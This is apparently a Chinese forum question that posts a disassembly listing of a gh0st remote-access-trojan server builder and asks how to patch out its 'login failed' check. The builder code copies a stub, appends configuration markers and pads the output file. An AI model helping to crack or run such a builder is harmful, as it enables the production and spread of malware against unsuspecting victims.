004030E2 . E8 959B1300 call 0053CC7C
004030E7 . 8B00 mov eax, dword ptr [eax]
004030E9 . 53 push ebx ; /FailIfExists
004030EA . 50 push eax ; |NewFileName
004030EB . 8D85 74FEFFFF lea eax, dword ptr [ebp-18C] ; |
004030F1 . 50 push eax ; |ExistingFileName
004030F2 . FF15 8C145700 call dword ptr [<&KERNEL32.CopyFileA>>; \CopyFileA
004030F8 . F7D8 neg eax
004030FA . 1AC0 sbb al, al
004030FC . 8D4D E0 lea ecx, dword ptr [ebp-20]
004030FF . FEC0 inc al
00403101 . 8845 CB mov byte ptr [ebp-35], al
00403104 . E8 61011400 call 0054326A
00403109 . 385D CB cmp byte ptr [ebp-35], bl
0040310C . 74 15 je short 00403123
0040310E . 8D45 AC lea eax, dword ptr [ebp-54]
00403111 . 68 184A5900 push 00594A18 ; /Arg2 = 00594A18
00403116 . 50 push eax ; |Arg1
00403117 . C745 AC 9C095>mov dword ptr [ebp-54], 005B099C ; |生成时错误1
0040311E . E8 3D5A1200 call 00528B60 ; \gh0st.00528B60
00403123 > 8B4D D0 mov ecx, dword ptr [ebp-30]
00403126 . 8D45 E0 lea eax, dword ptr [ebp-20]
00403129 . 50 push eax
0040312A . E8 4D9B1300 call 0053CC7C
0040312F . 8B00 mov eax, dword ptr [eax]
00403131 . 53 push ebx ; /hTemplateFile
00403132 . 68 80000000 push 80 ; |Attributes = NORMAL
00403137 . 6A 03 push 3 ; |Mode = OPEN_EXISTING
00403139 . 53 push ebx ; |pSecurity
0040313A . 6A 02 push 2 ; |ShareMode = FILE_SHARE_WRITE
0040313C . 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
00403141 . 50 push eax ; |FileName
00403142 . FF15 80145700 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
00403148 . 8D4D E0 lea ecx, dword ptr [ebp-20]
0040314B . 8945 EC mov dword ptr [ebp-14], eax
0040314E . E8 17011400 call 0054326A
00403153 . 837D EC FF cmp dword ptr [ebp-14], -1
00403157 . 75 15 jnz short 0040316E
00403159 . 8D45 B0 lea eax, dword ptr [ebp-50]
0040315C . 68 184A5900 push 00594A18 ; /Arg2 = 00594A18
00403161 . 50 push eax ; |Arg1
00403162 . C745 B0 90095>mov dword ptr [ebp-50], 005B0990 ; |生成时错误2
00403169 . E8 F2591200 call 00528B60 ; \gh0st.00528B60
0040316E > 6A 02 push 2 ; /Origin = FILE_END
00403170 . 53 push ebx ; |pOffsetHi
00403171 . 53 push ebx ; |OffsetLo
00403172 . FF75 EC push dword ptr [ebp-14] ; |hFile
00403175 . FF15 90145700 call dword ptr [<&KERNEL32.SetFilePoi>; \SetFilePointer
0040317B . 8B4D CC mov ecx, dword ptr [ebp-34]
0040317E . 68 36040000 push 436
00403183 . E8 ECF41300 call 00542674
00403188 . 8B35 7C175700 mov esi, dword ptr [<&USER32.SendMes>; USER32.SendMessageA
0040318E . 53 push ebx ; /lParam
0040318F . 53 push ebx ; |wParam
00403190 . 68 F0000000 push 0F0 ; |Message = BM_GETCHECK
00403195 . FF70 1C push dword ptr [eax+1C] ; |hWnd
00403198 . FFD6 call esi ; \SendMessageA
0040319A . 83F8 01 cmp eax, 1
0040319D . 75 47 jnz short 004031E6
0040319F . 50 push eax
004031A0 . 895D D8 mov dword ptr [ebp-28], ebx
004031A3 . E8 DEBF1300 call 0053F186
004031A8 . 59 pop ecx
004031A9 . 8945 D0 mov dword ptr [ebp-30], eax
004031AC . FF15 94145700 call dword ptr [<&KERNEL32.GetTickCou>; [GetTickCount
004031B2 . 50 push eax ; /<%d>
004031B3 . 68 8C095B00 push 005B098C ; |%d
004031B8 . FF75 D0 push dword ptr [ebp-30] ; |s
004031BB . FF15 9C155700 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
004031C1 . 83C4 0C add esp, 0C
004031C4 > 837D D8 01 cmp dword ptr [ebp-28], 1
004031C8 . 7D 1C jge short 004031E6
004031CA . 8D45 C0 lea eax, dword ptr [ebp-40]
004031CD . 53 push ebx
004031CE . 50 push eax
004031CF . FF75 D0 push dword ptr [ebp-30] ; /String
004031D2 . FF15 88145700 call dword ptr [<&KERNEL32.lstrlenA>] ; \lstrlenA
004031D8 . 50 push eax
004031D9 . FF75 D0 push dword ptr [ebp-30]
004031DC . FF75 EC push dword ptr [ebp-14]
004031DF . FFD7 call edi
004031E1 . FF45 D8 inc dword ptr [ebp-28]
004031E4 .^ EB DE jmp short 004031C4
004031E6 > 8B4D CC mov ecx, dword ptr [ebp-34]
004031E9 . 68 51040000 push 451
004031EE . E8 81F41300 call 00542674
004031F3 . 53 push ebx
004031F4 . 53 push ebx
004031F5 . 68 F0000000 push 0F0
004031FA . FF70 1C push dword ptr [eax+1C]
004031FD . FFD6 call esi
004031FF . 83F8 01 cmp eax, 1
00403202 . 0F85 A9000000 jnz 004032B1
00403208 . A1 68395B00 mov eax, dword ptr [5B3968]
0040320D . 8945 D8 mov dword ptr [ebp-28], eax
00403210 . 8B4D CC mov ecx, dword ptr [ebp-34]
00403213 . 68 4E040000 push 44E
00403218 . C645 FC 0A mov byte ptr [ebp-4], 0A
0040321C . E8 53F41300 call 00542674
00403221 . 8D4D D8 lea ecx, dword ptr [ebp-28]
00403224 . 51 push ecx
00403225 . 8BC8 mov ecx, eax
00403227 . E8 D9CE1300 call 00540105
0040322C . 8B45 D8 mov eax, dword ptr [ebp-28]
0040322F . 3958 F8 cmp dword ptr [eax-8], ebx
00403232 . 75 24 jnz short 00403258
00403234 . 6A 40 push 40 ; /Style = MB_OK|MB_ICONASTERISK|MB_APPLMODAL
00403236 . 68 E8085B00 push 005B08E8 ; |提示
0040323B . 68 7C095B00 push 005B097C ; |请填写增大m数
00403240 . 53 push ebx ; |hOwner
00403241 . FF15 98155700 call dword ptr [<&USER32.MessageBoxA>>; \MessageBoxA
00403247 . 8D4D D8 lea ecx, dword ptr [ebp-28]
0040324A . C645 FC 09 mov byte ptr [ebp-4], 9
0040324E . E8 17001400 call 0054326A
00403253 . E9 5F010000 jmp 004033B7
00403258 > BE 00001000 mov esi, 100000
0040325D . 56 push esi
0040325E . E8 23BF1300 call 0053F186
00403263 . 59 pop ecx
00403264 . 8945 E0 mov dword ptr [ebp-20], eax
00403267 . 56 push esi
00403268 . 53 push ebx
00403269 . 50 push eax
0040326A . E8 61571200 call 005289D0
0040326F . FF75 D8 push dword ptr [ebp-28]
00403272 . 895D D0 mov dword ptr [ebp-30], ebx
00403275 . FF15 A41D5900 call dword ptr [591DA4] ; gh0st.00529FFF
0040327B . 83C4 10 add esp, 10
0040327E . 8945 BC mov dword ptr [ebp-44], eax
00403281 > 8B45 BC mov eax, dword ptr [ebp-44]
00403284 . 3945 D0 cmp dword ptr [ebp-30], eax
00403287 . 7D 13 jge short 0040329C
00403289 . 8D45 B4 lea eax, dword ptr [ebp-4C]
0040328C . 53 push ebx
0040328D . 50 push eax
0040328E . 56 push esi
0040328F . FF75 E0 push dword ptr [ebp-20]
00403292 . FF75 EC push dword ptr [ebp-14]
00403295 . FFD7 call edi
00403297 . FF45 D0 inc dword ptr [ebp-30]
0040329A .^ EB E5 jmp short 00403281
0040329C > FF75 E0 push dword ptr [ebp-20]
0040329F . E8 0BBF1300 call 0053F1AF
004032A4 . 59 pop ecx
004032A5 . C645 FC 09 mov byte ptr [ebp-4], 9
004032A9 . 8D4D D8 lea ecx, dword ptr [ebp-28]
004032AC . E8 B9FF1300 call 0054326A
004032B1 > 8D45 C0 lea eax, dword ptr [ebp-40]
004032B4 . 53 push ebx
004032B5 . BE 74095B00 mov esi, 005B0974 ; gggggg
004032BA . 50 push eax
004032BB . 56 push esi ; /String => "GGGGGG"
004032BC . FF15 88145700 call dword ptr [<&KERNEL32.lstrlenA>] ; \lstrlenA
004032C2 . 50 push eax
004032C3 . 56 push esi
004032C4 . FF75 EC push dword ptr [ebp-14]
004032C7 . FFD7 call edi
004032C9 . 8B45 DC mov eax, dword ptr [ebp-24]
004032CC . 53 push ebx
004032CD . 8D4D DC lea ecx, dword ptr [ebp-24]
004032D0 . 8B70 F8 mov esi, dword ptr [eax-8]
004032D3 . E8 C2031400 call 0054369A
004032D8 . 8D4D C0 lea ecx, dword ptr [ebp-40]
004032DB . 53 push ebx
004032DC . 46 inc esi
004032DD . 51 push ecx
004032DE . 56 push esi
004032DF . 50 push eax
004032E0 . FF75 EC push dword ptr [ebp-14]
004032E3 . FFD7 call edi
004032E5 . 8D45 C0 lea eax, dword ptr [ebp-40]
004032E8 . 53 push ebx
004032E9 . BE 6C095B00 mov esi, 005B096C ; ssssss
004032EE . 50 push eax
004032EF . 56 push esi ; /String => "SSSSSS"
004032F0 . FF15 88145700 call dword ptr [<&KERNEL32.lstrlenA>] ; \lstrlenA
004032F6 . 50 push eax
004032F7 . 56 push esi
004032F8 . FF75 EC push dword ptr [ebp-14]
004032FB . FFD7 call edi
004032FD . 8B45 E8 mov eax, dword ptr [ebp-18]
00403300 . 53 push ebx
00403301 . 8D4D E8 lea ecx, dword ptr [ebp-18]
00403304 . 8B70 F8 mov esi, dword ptr [eax-8]
00403307 . E8 8E031400 call 0054369A
0040330C . 8D4D C0 lea ecx, dword ptr [ebp-40]
0040330F . 53 push ebx
00403310 . 46 inc esi
00403311 . 51 push ecx
00403312 . 56 push esi
00403313 . 50 push eax
00403314 . FF75 EC push dword ptr [ebp-14]
00403317 . FFD7 call edi
00403319 . FF75 EC push dword ptr [ebp-14] ; /hObject
0040331C . FF15 9C145700 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
00403322 . 8B4D CC mov ecx, dword ptr [ebp-34]
00403325 . 68 35040000 push 435
0040332A . E8 45F31300 call 00542674
0040332F . 53 push ebx ; /lParam
00403330 . 53 push ebx ; |wParam
00403331 . 68 F0000000 push 0F0 ; |Message = BM_GETCHECK
00403336 . FF70 1C push dword ptr [eax+1C] ; |hWnd
00403339 . FF15 7C175700 call dword ptr [<&USER32.SendMessageA>; \SendMessageA
0040333F . 83F8 01 cmp eax, 1
00403342 . 75 17 jnz short 0040335B
00403344 . 51 push ecx
00403345 . 8B4D B8 mov ecx, dword ptr [ebp-48]
00403348 . 8BC4 mov eax, esp
0040334A . 8965 B4 mov dword ptr [ebp-4C], esp
0040334D . 50 push eax
0040334E . E8 399A1300 call 0053CD8C
00403353 . 8B4D CC mov ecx, dword ptr [ebp-34]
00403356 . E8 BB000000 call 00403416
0040335B > 53 push ebx ; /Arg3
0040335C . 53 push ebx ; |Arg2
0040335D . 68 5C095B00 push 005B095C ; |生成文件成功.
00403362 . E8 C2851400 call 0054B929 ; \gh0st.0054B929
00403367 . EB 3F jmp short 004033A8
00403369 . 33DB xor ebx, ebx
0040336B . 395D C4 cmp dword ptr [ebp-3C], ebx
0040336E . 74 0A je short 0040337A
00403370 . FF75 C4 push dword ptr [ebp-3C]
00403373 . FF15 A01D5900 call dword ptr [591DA0] ; gh0st.00529242
00403379 . 59 pop ecx
0040337A > 8B4D B8 mov ecx, dword ptr [ebp-48]
0040337D . 8D45 BC lea eax, dword ptr [ebp-44]
00403380 . 50 push eax
00403381 . E8 F6981300 call 0053CC7C
00403386 . FF30 push dword ptr [eax] ; /FileName
00403388 . FF15 74145700 call dword ptr [<&KERNEL32.DeleteFile>; \DeleteFileA
0040338E . 8D4D BC lea ecx, dword ptr [ebp-44]
00403391 . E8 D4FE1300 call 0054326A
00403396 . 53 push ebx ; /Arg3
00403397 . 53 push ebx ; |Arg2
00403398 . FF75 A8 push dword ptr [ebp-58] ; |Arg1
0040339B . E8 89851400 call 0054B929 ; \gh0st.0054B929
004033A0 . B8 A6334000 mov eax, 004033A6
004033A5 . C3 retn
004033A6 . 33DB xor ebx, ebx
004033A8 > 8B4D CC mov ecx, dword ptr [ebp-34]
004033AB . C745 FC 07000>mov dword ptr [ebp-4], 7
004033B2 . E8 A6EFFFFF call 0040235D
004033B7 > 8D4D DC lea ecx, dword ptr [ebp-24]
004033BA . C645 FC 02 mov byte ptr [ebp-4], 2
004033BE . E8 A7FE1300 call 0054326A
004033C3 > 8D4D D4 lea ecx, dword ptr [ebp-2C]
004033C6 . C645 FC 01 mov byte ptr [ebp-4], 1
004033CA . E8 9BFE1300 call 0054326A
004033CF . 8D4D E4 lea ecx, dword ptr [ebp-1C]
004033D2 . 885D FC mov byte ptr [ebp-4], bl
004033D5 . E8 90FE1300 call 0054326A
004033DA . 834D FC FF or dword ptr [ebp-4], FFFFFFFF
004033DE > 8D4D E8 lea ecx, dword ptr [ebp-18]
004033E1 . E8 84FE1300 call 0054326A
004033E6 . EB 1F jmp short 00403407
004033E8 > 53 push ebx
004033E9 . 53 push ebx
004033EA . 68 50095B00 push 005B0950 ; 登录失败!
004033EF .^ E9 02FBFFFF jmp 00402EF6
004033F4 > 6A 40 push 40
004033F6 . 68 E8085B00 push 005B08E8 ; 提示
004033FB . 68 28095B00 push 005B0928 ; 端口范围只能为1~65535之间的一个数 ...
00403400 > 53 push ebx ; |hOwner
00403401 . FF15 98155700 call dword ptr [<&USER32.MessageBoxA>>; \MessageBoxA
00403407 > 8B4D F4 mov ecx, dword ptr [ebp-C]
0040340A . 5F pop edi
0040340B . 5E pop esi
0040340C . 64:890D 00000>mov dword ptr fs:[0], ecx
00403413 . 5B pop ebx
00403414 . C9 leave
00403415 . C3 retn
这段程序代码,怎样能跳过“登入错误”这个提示的验证,该怎么改?麻烦高手能帮忙分析一下么, 万分感谢
赞赏
赞赏
雪币:
留言:
